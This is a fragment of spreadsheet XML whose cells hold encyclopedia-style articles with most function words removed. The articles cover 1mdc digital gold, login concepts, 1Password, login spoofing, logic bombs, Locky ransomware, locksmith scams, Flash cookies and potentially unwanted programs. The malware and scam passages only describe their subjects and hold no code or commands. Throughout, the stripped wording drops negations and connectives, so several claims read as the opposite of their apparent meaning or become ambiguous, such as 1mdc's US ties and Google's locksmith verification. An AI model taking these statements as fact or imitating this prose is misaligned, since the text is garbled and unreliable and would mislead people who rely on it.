    <t>1mdc digital gold currency (dgc) existed 2001 2007 users traded digital currency backed reserves e-gold, rather physical bullion reserves.the website appeared switch various offshore hosting locations, used software designed interesting software ltd, anguilla company.as april 2007, court order forced e-gold liquidate large number e-gold accounts totalling million dollars' worth gold. small part seizure 1mdc's accounts assets [1]. court order reversed, user's e-gold grams remaining 1mdc "unbail" normally user's e-gold account. ultimately e-gold owned operated citizens, 1mdc users must respect decisions courts authorities regarding disposition e-gold safety security citizens. even though 1mdc connection whatsoever usa, 1mdc users non-usa, ultimately e-gold operated usa. features digital gold currency, used 1mdc keep assets away fiat currencies avoid inflationary risks associated them. open account, 1mdc required user functioning e-mail address, e-gold account, password, initials pin. 1mdc charged 0.05 gold grams spend accounts receive spends (total grams) account given calendar month. there spend fees accounts receive less spends calendar month, storage fees accounts. this sharp contrast e-gold, charges storage annum. coupled quick easy transfer funds e-gold 1mdc accounts, 1mdc attractive persons large amounts e-gold, whose balances gradually shrink e-gold's storage fees. 1mdc also offered virtually free exchange pecunix gold 1mdc, exchange 1mdc pecunix gold. often said heavy users e-gold 1mdc users, although course confirming this. criticisms 1mdc's e-gold held unallocated (pooled) storage several e-gold user accounts) allowed extra privacy e-gold's administrators. however, increased storage risk, client precedence e-gold entrusted 1mdc hold, virtually user ensure 1mdc maintaining full reserves e-gold. amount e-gold held 1mdc system undisclosed. also, since 1mdc backed e-gold, events affect e-gold also affected 1mdc. once e-gold ltd. instructed government freeze liquidate 1mdc accounts, 1mdc became insolvent default along e-gold accounts seized april action. references external links 1mdc homepage (defunct) archive 1mdc (2001–2007) indomitus report covering 1mdc (jan 2005)</t>
  </si>
  <si>
    <t>Login</t>
  </si>
  <si>
    <t>computer security, logging logging signing signing process individual gains access computer system identifying authenticating themselves. user credentials typically form username matching password, credentials sometimes referred login logon, sign-in, sign-on). practice, modern secure systems often require second factor email confirmation extra security. social login allows user existing user credentials social networking service sign create account website. when access longer needed, user (log off, sign sign off). procedure logging usually used enter specific page, website application, trespassers cannot see. once user logged login token used track actions user taken connected site. logging performed explicitly user taking actions, entering appropriate command clicking website link label such. also done implicitly, user powering workstation, closing browser window, leaving website, refreshing website within defined period. login page return parameter, specifies redirect back logging out. example, returnto= site. case websites cookies track sessions, user logs out, session-only cookies site usually deleted user's computer. addition, server invalidates associations session, thereby making session-handle user's cookie store useless. this feature comes handy user using public computer computer using public wireless connection. security precaution, rely implicit means logging system, especially public computer; instead, explicitly wait confirmation request taken place. logging computer, leaving common security practice preventing unauthorised users tampering there also people choose password-protected screensaver activate period inactivity, thereby requiring user re-enter login credentials unlock screensaver gain access system. there different methods logging image, fingerprints, scan, password (oral textual input), etc. history etymology terms became common time sharing systems 1960s bulletin board systems (bbs) 1970s. early home computers personal computers generally require windows os/2 linux 1990s. noun login comes verb (to) analogy verb clock computer systems keep users' access system. term "log" comes chip historically used record distance travelled recorded ship's book. sign connotes idea, based analogy manually signing book visitors book. while agreed difference meaning three terms (login, logon sign-in), different technical communities tend prefer another unix, novell, linux apple typically login, apple's style guide says "users file server (not to)...". contrast, microsoft's style guides traditionally suggested opposite prescribed logon. past, microsoft reserved sign-in accessing internet, windows onward moved sign-in terminology local authentication. also computer security login session login spoofing openid password password policy personal identification number /var/log/wtmp references</t>
  </si>
  <si>
    <t>Login.gov</t>
  </si>
  <si>
    <t>login.gov single sign-on solution government websites. enables users services numerous government agencies using username password. login.gov jointly developed digital service. initiative announced blog post 2016 system launched april 2017 replacement connect.gov. further reading "security everyone's job: delivering secure, usable login government". digital.gov. retrieved 2021-03-02. "18f offers specs gov-wide login fcw". fcw. retrieved 2018-02-16. "login.gov moving ahead fcw". fcw. retrieved 2018-02-16. "18f's plan single government login comes fire fedscoop". fedscoop. 2016-05-12. retrieved 2018-02-16. "can gsa's succeed management projects struggled?". federalnewsradio.com. 2016-05-23. retrieved 2018-02-16. "login.gov (consumer identity)". united states digital service. retrieved 2018-02-16. "ups downs continue 18f's identity management effort". federalnewsradio.com. 2017-01-09. retrieved 2018-02-16. "18f agencies: think before creating citizen login system". nextgov.com. retrieved 2018-02-16. also nstic gov.uk verify external links official website references</t>
  </si>
  <si>
    <t>1Password</t>
  </si>
  <si>
    <t>1password password manager developed agilebits inc. provides place users store various passwords, software licenses, sensitive information virtual vault locked pbkdf2-guarded master password. default, user’s encrypted vault hosted agilebits’ servers monthly fee. company based toronto. password file syncing 1password configured 1password.com, paid subscription-based server sync service maintained developers. local wi-fi icloud sync available macos previous versions.in 2017, travel mode feature introduced subscribers 1password.com, enables omission password entries tagged safe travel local storage particular device, reducing impact obliged officials unlock access country border crossings. browser extensions 1password integrates desktop browsers including safari, chrome, firefox, edge, opera. extension remember logins websites, fill website logins automatically, generate random passwords websites.to browser extensions, user must administrative rights computer browser installed. this problem users assigned workplace without admin rights. address problem, 1password offers plans monthly subscription aimed businesses allows access usernames passwords copied pasted login screens. plans family individual also available.1password also offers standalone extension called 1password available firefox, chrome, opera. 1password designed work without companion desktop app, 1password.com subscription required.on mobile side, 1password offers integration browsers apps android devices using various methods. more convenient methods filling saving login information provided android oreo (and later), respectively. history 2017 consumer reports article, guido, trail bits, listed 1password popular password manager (alongside dashlane, keepass, lastpass), choice among mostly personal preferences.before 1password move purely subscription-based service 2018, 1password could store password files locally, sync remote servers, purchasing software license ($64.99 2018). december 2019, users still perpetual licence 1password within app. apple's browser safari makes installation 1password extension impossible, thus forcing users upgrade 1password v7.on november 2019, 1password announced partnership venture capital firm accel, invested $200 million series funding round obtained minority stake company. first outside funding 1password's history, largest single investment accel made date.in 2021, 1password acquired secrethub, dutch cybersecurity company. also raised $100 million financing valuation billion.in january 2022, 1password raised $620 million series round, biggest funding round canadian history, iconiq growth, increasing company's valuation $6.8 billion. notable individual investors took part round ryan reynolds, robert downey jr., justin timberlake. march 2022, ryan reynolds starred 1password commercial creative agency, maximum effort, features welsh soccer club reynolds co-owns, wrexham a.f.c. also password manager cryptography comparison password managers list password managers references external links official website</t>
  </si>
  <si>
    <t>Login spoofing</t>
  </si>
  <si>
    <t>login spoofings techniques used steal user's password. user presented ordinary looking login prompt username password, actually malicious program (usually called trojan horse) control attacker. when username password entered, information logged passed along attacker, breaching security. prevent this, operating systems require special combination (called secure attention key) entered login screen presented, example control-alt-delete. users instructed report login prompts appear without pressed secure attention sequence. only kernel, part operating system interacts directly hardware, detect whether secure attention pressed, cannot intercepted third party programs (unless kernel compromised). similarity phishing while similar login spoofing, phishing usually involves scam victims respond unsolicited e-mails either identical similar appearance familiar site prior affiliation with. login spoofing usually indicative much heinous form vandalism attack case attacker already gained access victim computer least degree. internet internet-based login spoofing caused compromised sites named similarly legitimate sites: typos bring people there. references external link recommendation possible login spoofing</t>
  </si>
  <si>
    <t>Believe Music</t>
  </si>
  <si>
    <t>believe (also known believe music; previously known believe digital) french record label music distributor. brands merch labels, believe distribution services, allpoints, naïve, nuclear blast. history beginnings company founded 2005 denis ladegaillerie, arnaud chiaramonti nicolas laclias.although operating global headquarter (believe paris, france, company legally headquartered believe international) luxembourg. according david wagner, member luxembourgish parliament, country common destination among multinational companies looking exemptions. dutch member european parliament paul tang corroborates: “there plenty evidence foreign investment flowing small countries ireland luxembourg without link actual activity”. growth believe acquired distribution service independent artists tunecore april 2015. believe's expansion fuelled $60m growth capital investment technology crossover ventures (tcv) xange. august 2016, company acquired french independent label naive records €10m, seeking improve value company's extensive back catalogue, restarted label's issuing recordings physical 2017. september 2018, believe acquired stake french indie label tard wagram music. october 2018, believe acquired majority stake german label nuclear blast. according news reports, believe projected reach €700 million revenue 2019, providing services distribution million artists. 2019, estimated 3000 employees worldwide. company embarked expansion drive developing digital music markets russia india. 2019, believe acquired mumbai live event production specialist entco, rebranded company “believe entertainment.” copyright controversy believe accused copyright trolling, particularly youtube, alleged engage claiming copyright works either copyright free rights company subject york federal lawsuit alleging behind large scale, willful copyright infringement. awards september 2019, french government identified believe promising french start-ups, french tech next40 index. october 2019, believe named europe’s “allstar” company 17th annual investor allstars awards london. references</t>
  </si>
  <si>
    <t>Logical security</t>
  </si>
  <si>
    <t>logical security consists software safeguards organization’s systems, including user identification password access, authenticating, access rights authority levels. these measures ensure authorized users able perform actions access information network workstation. subset computer security. elements elements logical security are: user ids, also known logins, user names, logons accounts, unique personal identifiers agents computer program network accessible agent. these identifiers based short strings alphanumeric characters, either assigned chosen users. authentication process used computer program, computer, network attempt confirm identity user. blind credentials (anonymous users) identity, allowed enter system. confirmation identities essential concept access control, gives access authorized excludes unauthorized. biometrics authentication measuring user’s physiological behavioral features attempt confirm his/her identity. physiological aspects used include fingerprints, retinas irises, voice patterns, facial patterns, hand measurements. behavioral aspects used include signature recognition, gait recognition, speaker recognition typing pattern recognition. when user registers system he/she attempt access later, his/her physiological characteristics obtained processed numerical algorithm. this number entered database, features user attempting match stored features must match certain error rate. token authentication token authentication small devices authorized users computer systems networks carry assist identifying logging computer network system actually authorized. they also store cryptographic keys biometric data. popular type security token (rsa securid) displays number changes every minute. users authenticated entering personal identification number number token. token contains time clock unique seed value, number displayed cryptographic hash seed value time day. computer accessed also contains algorithm able match number matching user’s seed time day. clock error taken account, values minutes sometimes accepted. another similar type token (cryptogram) produce value time button pressed. other security tokens connect directly computer usb, smart card bluetooth ports, special purpose interfaces. cell phones pda's also used security tokens proper programming. password authentication password authentication uses secret data control access particular resource. usually, user attempting access network, computer computer program queried whether know password not, granted denied access accordingly. passwords either created user assigned, similar usernames. however, assigned password, user usually given option change password something his/her choice. depending restrictions system network, user change his/her password alphanumeric sequence. usually, limitations password creation include length restrictions, requirement number, uppercase letter special character, able past four five changed passwords associated username. addition, system force user change his/her password given amount time. two-way authentication two-way authentication involves user system network convincing know shared password without transmitting password communication channel. this done using password encryption transmit randomly generated piece information, “the challenge.” side must return similarly encrypted value predetermined function originally offered information, his/her “response,” proves he/she able decrypt challenge. kerberos computer network authentication protocol) good example this, sends encrypted integer response must encrypted integer common setup access rights access rights authority levels rights power granted users create, change, delete view data files within system network. these rights vary user user, range anonymous login (guest) privileges superuser (root) privileges. guest superuser accounts extremes, individual access rights denied granted user. usually, system administrator (a.k.a. superuser) ability grant deny rights. guest accounts, anonymous logins, multiple users account time without password. users sometimes asked type username. this account limited access, often allowed access special public files. usually, anonymous accounts read access rights security purposes. superuser authority level assigned system administrators computer operating systems. unix related operating systems, level also called root access rights system, including changing ownership files. pre-windows systems (such windows 9x), users effectively superusers, users access rights. windows related systems (such windows 2000 xp), superuser known administrator account. however, administrator account exist depending whether separation also methods kerberos security security references sourcespecific</t>
  </si>
  <si>
    <t>Logic bomb</t>
  </si>
  <si>
    <t>logic bomb piece code intentionally inserted software system malicious function specified conditions met. example, programmer hide piece code starts deleting files (such salary database trigger), ever terminated company. software inherently malicious, viruses worms, often contain logic bombs execute certain payload pre-defined time condition met. this technique used virus worm gain momentum spread noticed. some viruses attack host systems specific dates, friday 13th april fools' day. trojans computer viruses activate certain dates often called "time bombs". considered logic bomb, payload unwanted unknown user software. example, trial programs code disables certain functionality time normally regarded logic bombs. supposed logic bombing trans-siberian pipeline reported 1982, trans-siberian pipeline incident occurred logic bomb. later reported story hoax.) operative reported stolen plans sophisticated control system software canadian firm, siberian pipeline. central intelligence agency (cia) supposedly tipped documents farewell dossier company insert logic bomb program sabotage purposes. successful logic bombs june 2006 roger duronio, system administrator ubs, charged using logic bomb damage company's computer network, securities fraud failed plan drive company's stock activation logic bomb. duronio later convicted sentenced years month prison, well $3.1 million restitution ubs. march 2013, attack launched south korea, logic bomb struck machines "wiped hard drives master boot records least three banks media companies simultaneously." symantec reported malware also contained component capable wiping linux machines. july 2019, david tinley, contract employee, pleaded guilty programming logic bombs within software created siemens corporation. software intentionally made malfunction certain amount time, requiring company hire fee. logic bombs went undetected years, discovered town hand administrative password software. attempted logic bombs february 2000, tony xiaotong indicted grand jury, accused planting logic bomb employment programmer securities trader deutsche morgan grenfell. bomb, planted 1996, trigger date july 2000, discovered programmers company. removing cleaning bomb allegedly took several months. october 2003 yung-hsun lin, also known andy lin, changed code server medco health solutions inc.'s fair lawn, jersey headquarters, employed unix administrator, creating logic bomb birthday 2004. failed work programming error, corrected error reset next birthday, discovered disabled medco computer systems administrator months trigger date. pleaded guilty sentenced months jail federal prison addition $81,200 restitution. charges held maximum sentence years fine us$250,000. october 2008 logic bomb discovered american mortgage giant fannie mae. bomb planted rajendrasinh babubhai makwana, contractor worked fannie mae's urbana, maryland facility. bomb activate january 2009 could wiped fannie mae's 4000 servers. makwana terminated around 1:00 p.m. october 2008 managed plant bomb network access revoked. makwana indicted maryland court january 2009 unauthorized computer access, convicted october 2010, sentenced months prison december 2010. october 2009, douglas duchak terminated data analyst colorado springs operations center (csoc) u.s. transportation security administration. surveillance cameras captured images duchak entering facility hours loading logic bomb onto csoc server stored data u.s. marshals. january 2011, duchak sentenced years prison, $60,587 fines, three years probation. sentencing, duchak tearfully apologized lawyer noted time incident, duchak's wife pregnant second child. judge sentencing mentioned logic bomb planting "incident anomaly otherwise untarnished work history." fictional logic bombs "moffett's ghost", episode airwolf television series, hawke loses control onboard computer, programmed timer airwolf's creator, doctor charles henry moffett. once activated, airwolf destroy aircraft range. michael crichton's book jurassic park, computer technician dennis nedry inserted object mainframe coding park would shut entire island's power (including supply electric fences) order steal several dinosaur embryos chaos. logic bomb object named "white rabbit". clancy book debt honor features logic bomb installed code various stock market computers. hugh jackman's character swordfish, stanley jobson, claims "dropped logic bomb trapdoor" hacking department defense network. episode "scattered" 2004 re-imagining battlestar galactica, cylons leave logic bomb ship's computers briefly gaining access them. later causes series nearly catastrophic system malfunctions. level clancy's splinter cell, console video game, conversation heard reference logic bomb. season nina myers manipulates jack bauer unknowingly activate virus computer systems. activated phone call certain number. season episode spooks, yalta organization sets logic bomb planted within american defense network shut controlled satellites. activated entry code game causes logic bomb copy virus satellites shut down. series episode ncis, abby mcgee conversation logic gives idea using logic bomb hack computers naval carrier access certain files. details bomb seen screen discussed all. season episode criminal minds ("the black queen"), logic bomb used team begins deleting information failed attempts crack code. season episode robot ("eps2.3_logic-b0mb.hc"), elliot discusses logic bomb hack agents' android phones corp's network applications. series illuminae files, kady grant, byron zhang, aidan write logic bomb send onboard computer lincoln. video game clancy's rainbow siege, character dokkaebi capable deploying logic bomb override enemy phones provoke distraction. "autofac" episode electric dreams, logic bomb weapon used attempt take organization seems solely autonomous drones robots restricts human activities post-apocalyptic world. 2022 film batman, thumb drive inserted detective gordon's laptop triggers logic bomb emails incriminating evidence various gotham city newspapers gordon's email address. also time bomb (software) backdoor (computing) easter (media) cyberwarfare stuxnet fork bomb references</t>
  </si>
  <si>
    <t>Loggly</t>
  </si>
  <si>
    <t>solarwinds loggly cloud-based management analytics service provider based francisco, california. gifford, raffael marty, kord campbell founded company 2009, charlie oppenheimer loggly announced acquisition solarwinds part solarwinds cloud division brands) january 2018. history 2009, gifford, raffael marty, kord campbell founded loggly. app47, mobile application management provider, partnered loggly september 2012. company chose loggly software-as-a-service (saas) deployment option. september 2013, loggly released "generation updated version service. update included collection standard syslog protocols graphical interface allowed users point-and-click process find events generate charts. that month, loggly completed $10.5 million funding round cisco data collective. trinity ventures, true ventures matrix partners also participated round.in october 2014, company announced million series funding round harmony partners. matrix partners, trinity ventures, cisco, data collective, true ventures also participated. funding round raised loggly's total investment funding $33.4 million. company released loggly dynamic field explorer, user experience aims reduce time developers spend identifying troubleshooting problems, month.on january 2018, company announced part solarwinds. operations loggly headquartered francisco, california. company employees 10,000 customers october 2017. loggly records data device reports real-time management platform trend data. technology loggly cloud-based management service provider. require proprietary software agents collect data. service uses open source technologies, including elasticsearch, apache lucene apache kafka. also splunk sumo logic logdna logz.io references external links official website</t>
  </si>
  <si>
    <t>Locky</t>
  </si>
  <si>
    <t>locky ransomware malware released 2016. delivered email (that allegedly invoice requiring payment) attached microsoft word document contains malicious macros. when user opens document, appears full gibberish, includes phrase "enable macro data encoding incorrect," social engineering technique. user enable macros, save binary file downloads actual encryption trojan, encrypt files match particular extensions. filenames converted unique letter number combination. initially, .locky file extension used encrypted files. subsequently, file extensions used, including .zepto, .odin, .aesir, .thor, .zzzzz. after encryption, message (displayed user's desktop) instructs download browser visit specific criminal-operated site information. site contain instructions demand payment bitcoin november 2017, bitcoin varies value $9,000 $10,000 bitcoin exchange). find locky must follow instructions clearly. since criminals possess private remote servers controlled them, victims motivated decrypt files. operation commonly reported mechanism infection involves receiving email microsoft word document attachment contains code. document gibberish, prompts user enable macros view document. enabling macros opening document launch locky virus. once virus launched, loads memory users system, encrypts documents hash.locky files, installs .bmp .txt files, encrypt network files user access this different route ransomware since uses macros attachments spread rather installed trojan using previous exploit. updates june 2016, necurs released version locky loader component, includes several detection-avoiding techniques, detecting whether running within virtual machine within physical machine, relocation instruction code.since locky released numerous variants released used different extensions encrypted files. many extensions named gods norse egyptian mythology. when first released, extension used encrypted files .locky. other versions utilized .zepto, .odin, .shit, .thor, .aesir, .zzzzz extensions encrypted files. current version, released december 2016, utilizes .osiris extension encrypted files. distribution methods many different distribution methods locky used since ransomware released. these distribution methods include exploit kits, word excel attachments malicious macros, docm attachments, zipped attachments.the general consensus among security experts protect ransomware, including locky, keep installed programs updated open attachments known senders. encryption locky uses rsa-2048 aes-128 cipher mode encrypt files. keys generated server side, making manual decryption impossible, locky ransomware encrypt files fixed drives, removable drives, network disk drives. prevalence locky reported sent half-million users february 2016, period immediately attackers increased distribution millions users. despite newer version, google trend data indicates infections dropped around june 2016. notable incidents february 2016, hollywood presbyterian medical center paid $17,000 ransom form bitcoins decryption patient data. hospital infected delivery email attachment disguised microsoft word invoice. this increased fear knowledge ransomware general brought ransomware public spotlight again. there appears trend ransomware used attack hospitals appears growing. necurs went dormant, perhaps glitch server. according softpedia, less spam emails locky dridex attached june however, malwaretech discovered necurs's bots consistently polled server replied digitally signed response. this signified necurs longer dormant. cybercriminal group also started sending large quantity spam emails improved versions locky dridex attached them, well message zipped javascript code emails.in april 2016, dartford science technology college computers infected virus. student opened infected email quickly spread encrypted many school files. virus stayed computer several weeks. eventually, managed remove virus using system restore computers. spam email vector example message locky attachment following: dear (random name): please find attached invoice services rendered additional disbursements above-mentioned matter. hoping satisfaction, remain sincerely, (random name) (random title) references</t>
  </si>
  <si>
    <t>Locksmith scam</t>
  </si>
  <si>
    <t>locksmith scam scam involving fake business listings cheap locksmith services that, called out, overcharge customer. scam targets people call locksmith desperation, usually locked premises. locksmith scams reported u.s., u.k., zealand.the scams work flooding business-finding services multitude faux business listings. phone numbers listings eventually link back single operation, usually without legitimate address license. descriptions similar legitimate locksmiths, accompanied similarly misleading advertising, usually quoting unusually price. person turns perform shoddy work overcharge service parts. since customer never knows real business people involved, best single phony listing removed process takes time negatively impact scammer much, simply create fake listings. side-effects scam include damage legitimate locksmiths lose business tend angry calls people believing responsible. google maps particularly vulnerable operation 2010s. began requiring people advertising locksmith services canada complete "advanced verification" process 2018, markets. structure such scams involve: lead generation, designed confuse potential customers believing scammer legitimate, low-priced, locksmith:creating websites, search engine advertisements business directory listings designed resemble legitimate locksmiths. using retouched photographs depicting locksmith stores locations store actually exists. procuring dishonest reviews. using names similar identical legitimate locksmiths. using addresses either fictitious, boxes, belong existing home business (sometimes, always, locksmith business). driving price online advertisements make unaffordable legitimate locksmiths. (locksmiths businesses among worst affected click fraud.) calls routed call centre, rather actual locksmith. unrealistically prices advertised, quoted call centre, together caveat, "and up". lead conversion, mark bluntly persuaded part money: using vehicles signage magnetic stick-on signage, reduce accountability. using staff lacking identification uniforms, reduce accountability. disinterest customer's right access vehicle building call-out relates; example, failing customer proof ownership. refusing provide written estimate, also reduce accountability. insisting upon destructive rather non-destructive entry, typically destroying original lock necessitating purchase replacement lock. charging excessive prices, even prices advertised quoted call centre (i.e. bait-and-switch). insisting upon payment cash debit card (because paid credit card, charges potentially reversible). legal action locksmiths observers noted search engine companies make substantial income paid-for listings, regardless whether listings legitimate spam. writing 2016, cory doctorow claimed "nearly every locksmith appears google maps fake business redirects call center dispatches scammy, distant, barely trained locksmith who'll come charge 5-10 times quoted."in u.s. 2005, bronx-based company sued chicago department consumer services alleged consumer fraud.in u.s. 2009, three alleged locksmith scammers unsuccessfully prosecuted louis.in u.k. 2010, locksmith scammer successfully prosecuted.in u.s. 2014, locksmith based virginia sued google, yellowbook (hibu), ziplocal, numerous laws, requesting companies "remove fraudulent locksmith listings search results". this, too, unsuccessful, companies' immunity communications decency act.in u.s. 2017–2018, group locksmiths filed lawsuit google, yahoo, bing, alleging search engines allowed spam listings drown legitimate, organic search results. this class action dismissed court appeals washington 2019. eastwood atlas locksmith solutions, al.(maricopa county superior court, az), atlas disclosed subscribed telephone numbers phoenix metropolitan market, assigned numbers address atlas location legitimate business interest, multiplied phone number/address combinations different company names spreadsheet causing veritel defunct telephone company clay doren) publish 1,150 separate distinct fraudulent telephone listings promulgated distributed consumers google, yahoo, distributed wholesale basis information brokers including acxiom others.google says removed billions advertisements violated policies, improved verification systems combat listings fraud. however, although google requires people advertising locksmith services canada complete "advanced verification" process, markets. also, google reportedly resisted removing fraudulent listings. also adversarial information retrieval criticism google deregulation hijacked journal misinformation passing sybil attack typosquatting references</t>
  </si>
  <si>
    <t>Local shared object</t>
  </si>
  <si>
    <t>local shared object (lso), commonly called flash cookie (due similarity http cookie), piece data websites adobe flash store user's computer. local shared objects used versions flash player (developed macromedia, later acquired adobe systems) since version 6.flash cookies, stored retrieved whenever user accesses page containing flash application, form local storage. similar cookies, used store user preferences, save data flash games, track users' internet activity. lsos criticised breach browser security, browser settings addons limit duration storage. storage local shared objects contain data stored individual websites. data stored action message format. with default settings, flash player seek user's permission store local shared objects hard disk. default, application running flash player version sept 2011) store data user's hard drive. application attempts store more, dialog asks user whether allow deny request.adobe flash player allow third-party local shared objects shared across domains. example, local shared object "www.example.com" cannot read domain "www.example.net". however, first-party website always pass data third-party settings found dedicated file passing data request third party. also, third-party lsos allowed store data default. default, data shared across browsers machine. example: visitor accesses site using firefox browser, views page displaying specific product, closes firefox browser, information product stored lso. visitor, using machine opens internet explorer browser visits page site viewed firefox, site read value(s) internet explorer browser, display dynamic content otherwise target visitor.this distinct cookies directory isolated storage paths saved cookies lsos common directory path browsers single machine. application games flash games files store user's personal game data, user preferences actual game progress. backing files requires technical understanding software. however, browser updates programs designed remove unused files delete data. prevent cheating, games designed render files unusable acquired another location. privacy concerns http cookies, local shared objects used websites collect information people navigate them, although users taken steps restrict data collection. online banks, merchants, advertisers local shared objects tracking purposes.on august 2009, wired magazine reported half websites used local shared objects track users store information them, four mentioned privacy policy. "flash cookies relatively unknown users," article said, "even user thinks cleared computer tracking objects, likely not." article says websites flash cookies hidden backups restore http cookies deleted users.according york times, july 2010 least five class-action lawsuits united states media companies using local shared objects.in certain countries, illegal track users without knowledge consent. example, united kingdom, customers must consent cookies/local shared objects: cookies similar devices must used unless subscriber user relevant terminal equipment: provided clear comprehensive information purposes storage access information; given opportunity refuse storage access information. local shared objects first subject discussed federal trade commission (ftc) roundtable january 2010. chairman leibowitz talking adobe describes "the flash problem." user control users disable local shared objects using global storage settings panel online settings manager adobe's website. however, places permanent flash cookie computer, informing websites user want flash cookies stored computer. users lsos specified sites flash player's "settings", accessed right-clicking player, using website storage settings panel; latter also allows users delete local shared objects.users also delete local shared objects either manually using third-party software. instance, ccleaner, standalone computer program microsoft windows allows users delete local shared objects demand. there also firefox add-on, clear flash cookies, automatically clear lsos time browser restarted.since version 10.3 flash, online settings manager (letting users configure privacy security permissions adobe's website) superseded local settings manager windows, mac, linux platforms. accessed windows control panel system preferences. users operating systems still adobe online settings manager. since least april 2012 11.2.202.233), updating downloading flash version resets security privacy settings defaults allowing local storage asking media access again, users' wishes. browser control browser control refers browser's ability delete local shared objects prevent creation persistent local shared objects privacy mode enabled. former, internet explorer released march 2009, implements allows browser extensions co-operate browser delete persistent data stored user issues delete browsing history command. however, years passed since introduction adobe, march 2011, announced flash player v10.3, still development time, supports co-operating internet explorer later delete local shared objects.also january 2011, adobe systems, google inc., mozilla foundation finalized browser (dubbed npapi clearsitedata). this allow browsers implementing clear local shared objects. four months later, adobe announced flash player 10.3 enables mozilla firefox "future releases apple safari google chrome" delete local shared objects, since version firefox treats lsos http cookies deletion rules previously applied http cookies also apply lsos. this caused loss data backward-incompatible flash application behavior firefox flash users used http cookies flash local shared objects different goals. mainly affected flash gamers, rely flash lsos store saved games. resulting support requests cannot solved favorably mozilla firefox users without changes browser, introduced equivalence http flash cookies. currently, workaround either configure browser never clear history data cookies revert part changes affecting case, using third-party patches.as behavior browser's privacy mode, adobe flash player 10.1, released june 2010, supports privacy modes internet explorer, mozilla firefox, google chrome, safari. local shared objects created privacy discarded session. those created regular session also accessible privacy mode. third-party software viewers editors libraries frameworks cleaners also http cookie evercookie storage indexed database database google gears device fingerprint canvas fingerprinting references external links adobe's online tool site erase flash cookies manage flash player settings what local shared objects?, adobe flash player security privacy help "new technique tracking site visitors". slashdot. 2005-04-04. retrieved 2007-12-05. "tracking flash cookies". informit. 2007-10-05. archived original 2007-12-14. retrieved 2007-12-05. block flash cookies electronic privacy information center "local shared objects" legal action 'zombie cookies' filed court</t>
  </si>
  <si>
    <t>Potentially unwanted program</t>
  </si>
  <si>
    <t>potentially unwanted program (pup) potentially unwanted application (pua) software user perceive unwanted unnecessary. used subjective tagging criterion security parental control products. such software implementation compromise privacy weaken computer's security. companies often bundle wanted program download wrapper application offer install unwanted application, cases without providing clear opt-out method. antivirus companies define software bundled potentially unwanted programs include software displays intrusive advertising (adware), tracks user's internet usage sell information advertisers (spyware), injects advertising pages user looks uses premium services rack charges user. growing number open-source software projects expressed dismay third-party websites wrapping downloads unwanted bundles, without project's knowledge consent. nearly every third-party free download site bundles downloads potentially unwanted software. practice widely considered unethical violates security interests users without informed consent. some unwanted software bundles install root certificate user's device, allows hackers intercept private data banking details, without browser giving security warnings. united states department homeland security advised removing insecure root certificate, make computers vulnerable serious cyberattacks. software developers security experts recommend people always download latest version official project website, trusted package manager store. origins historically, first companies working potentially unwanted programs creating revenue came mid-2000s, zango. these activities declined companies investigated, cases indicted, authorities invasive harmful installs. download valley major industry, dedicated creating revenue foisting potentially unwanted programs, grown among israeli software industry frequently referred download valley. these companies responsible large part download install tools, place unwanted, additional software users' systems. unwanted programs unwanted programs increased recent years, study 2014 classified unwanted programs comprising 24.77% total malware infections. this malware includes adware according google. many programs include unwanted browser add-ons track websites user goes order sell information advertisers, advertising pages. five percent computer browser visits google-owned websites altered computer programs inject pages. researchers identified 50,870 google chrome extensions 34,407 programs inject ads. thirty-eight percent extensions percent programs catalogued malicious software, rest potentially unwanted adware-type applications. some google chrome extension developers sold extensions made third-party companies silently push unwanted updates incorporate previously non-existent adware extensions. local proxies spyware programs install proxy server person's computer monitors traffic passing tracking user interests build profile sell profile advertisers. superfish superfish advertising injector creates root certificate computer operating system, allowing tool inject advertising encrypted google search pages track history user's search queries. february 2015, united states department homeland security advised uninstalling superfish associated root certificate lenovo computers, make computers vulnerable serious cyberattacks, including interception passwords sensitive data transmitted browsers. heise security revealed superfish certificate included bundled downloads number applications companies including media lavasoft's ad-aware companion. browser hijacking many companies browser hijacking modify user's home page search page, force internet hits particular website make money advertisers. some companies steal cookies user's browser, hijacking connections websites logged into, performing actions using account, without user's knowledge consent (like installing android apps). fraudulent dialer users dial-up internet access modems computer connect internet, targeted fraudulent applications used security holes operating system dial premium numbers. many android devices targeted malware premium services rack charges users. unwanted user classes software usually installed knowingly user show automated abusive behavior. however, enterprise controlling computer antivirus vendor consider program unwanted activities allow. peer-to-peer file sharing programs sometimes labelled deleted alleged links piracy. march 2021, windows defender started removing utorrent qbittorrent, causing widespread user confusion. microsoft since updated database flag torrent clients enterprise installations only.keygens tainted actual malware also commonly tagged piracy. third party websites 2015, research emsisoft suggested free download providers bundled downloads potentially unwanted software, download.com worst offender. lowell heddings expressed dismay "sadly, even google results open source freeware really terrible sites bundling crapware, adware, malware installer." download.com december 2011 gordon lyon published strong dislike download.com started bundling grayware installation managers concerns bundled software, causing many people spread post social networks, dozen media reports. main problem confusion download.com-offered content software offered original authors; accusations included deception well copyright trademark violation.in 2014, register us-cert warned download.com's "foistware", "attacker able download execute arbitrary code". sourceforge many open-source software developers expressed frustration dismay work packaged companies profit work using search advertising occupy first result search page. increasingly, pages offering bundled installers include unwanted software, confuse users presenting bundled software official download page endorsed open source project. early 2016 longer case. ownership sourceforge transferred sourceforge media, llc, subsidiary bizx, (bizx). after sale removed devshare program, means bundled installers longer available. gimp november 2013, gimp, free image manipulation program, removed download sourceforge, citing misleading download buttons potentially confuse customers, well sourceforge's windows installer, bundles third-party offers. statement, gimp called sourceforge "useful trustworthy place develop host floss applications" faces problem allow sites ..." 2015, gimp windows sourceforge project transferred ownership "sourceforge editorial staff" account adware downloads re-enabled. happened developers nmap.in 2015 sourceforge took control projects migrated hosting sites replaced project downloads adware-laden downloads. nmap gordon lyon lost control nmap sourceforge page, sourceforge taking project's page. lyon stated seem providing official nmap files long click fake download buttons) caught trojaning nmap gimp. certainly trust bit! sourceforge pulling scheme cnet download.com tried back started circling drain". media player videolan expressed dismay users searching product search advertising websites offer "bundled" downloads include unwanted programs, videolan lacks resources many companies abusing trademarks. also conduit toolbar pre-installed software shovelware references</t>
  </si>
  <si>
    <t>2014 celebrity nude photo leak</t>
  </si>
  <si>
